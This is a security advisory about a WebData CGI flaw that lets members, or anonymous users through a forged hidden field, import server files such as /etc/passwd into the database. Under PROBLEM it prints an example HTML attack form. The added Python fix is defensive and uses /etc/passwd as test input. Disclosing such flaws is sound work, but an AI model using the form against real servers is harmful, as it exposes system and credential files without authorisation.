COMMAND

    WebData

SYSTEMS AFFECTED

    Webteachers WebData

PROBLEM

    The following is based on Delphis Consulting Security Advisory
    DST2K0039.  Delphis Consulting Internet Security Team (DCIST)
    discovered the following vulnerability in WebData under Linux
    (although not tested under Windows NT, we would expect the same
    results).

    It is possible to import any file (e.g. /etc/passwd) from the file
    system which the Webserver user (e.g. nobody) has access to into
    the WebData database.  This enables potential attackers to gain
    access to the contents of a number of key files (e.g. hosts.allow,
    hosts.deny, etc.) by browsing the database afterwards.  Note: You
    need at least a member account to perform this action.

    The script below will not work as-is; it needs some adaptation to
    your database.  It enables a user to import anonymously any file
    that the web user has access to.

    Example script:

        <form action="http://127.0.0.1/cgi-bin/webdata_test.pl" method="post">
        <INPUT TYPE=TEXT SIZE=60 NAME="pathname"><BR>
        <font size=3>Is the file comma or tab delimited?</font></B>
        <select name="delimiter" size=1>
        <option value="comma">comma
        <option value="tab">tab
        <option value="pipe">pipe
        </select>
        <INPUT TYPE=HIDDEN NAME="member" VALUE="anonymous">
        <input type=hidden name="cgifunction" value="import2">
        <BR>
        <INPUT TYPE=SUBMIT VALUE="Import">
        </form>

SOLUTION

    A new version of WebData has been released.  The security problem
    is addressed in the new version in the following manner.

    Only  the  admin  can  use  the  "filename"  method  of importing.
    Members must use the file upload  method.  The "enter the path  to
    the file" box does not appear on the import screen when the userid
    is not  "admin".   The program  also checks  the userid during the
    actual  importing,  so  a  hacker   could  not  simply  type   the
    querystring for a file import into the location box.
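
    The server-side check described above, as an added example (not
    WebData's own code).  The names IMPORT_ROOT, authorize_import and
    session_user are assumptions, and the directory confinement for
    admin imports goes beyond the fix the vendor describes.

```python
import os

# Assumed names, not WebData's own: IMPORT_ROOT, authorize_import(), and a
# session_user that the server takes from its own authenticated session.
IMPORT_ROOT = "/var/webdata/import"  # hypothetical admin import directory


def authorize_import(session_user, form):
    """Return (allowed, reason) for a submitted form (dict of field values)."""
    if form.get("cgifunction") != "import2":
        return True, "not an import request"
    if session_user is None:
        return False, "not authenticated"
    # The 'member' form field is client-controlled, so it is ignored here:
    # identity comes only from session_user.
    pathname = form.get("pathname", "")
    if not pathname:
        return True, "file upload import"
    if session_user != "admin":
        return False, "pathname import is admin-only"
    # Beyond the advisory's fix (assumption): keep admin imports in IMPORT_ROOT.
    root = os.path.realpath(IMPORT_ROOT)
    real = os.path.realpath(os.path.join(root, pathname))
    if os.path.commonpath([root, real]) != root:
        return False, "path outside import directory"
    return True, "admin pathname import"


if __name__ == "__main__":
    # Constructed request carrying the same fields as the form above.
    request = {"cgifunction": "import2", "pathname": "/etc/passwd",
               "delimiter": "comma", "member": "anonymous"}
    for user in (None, "alice", "admin"):
        print(user, authorize_import(user, request))
```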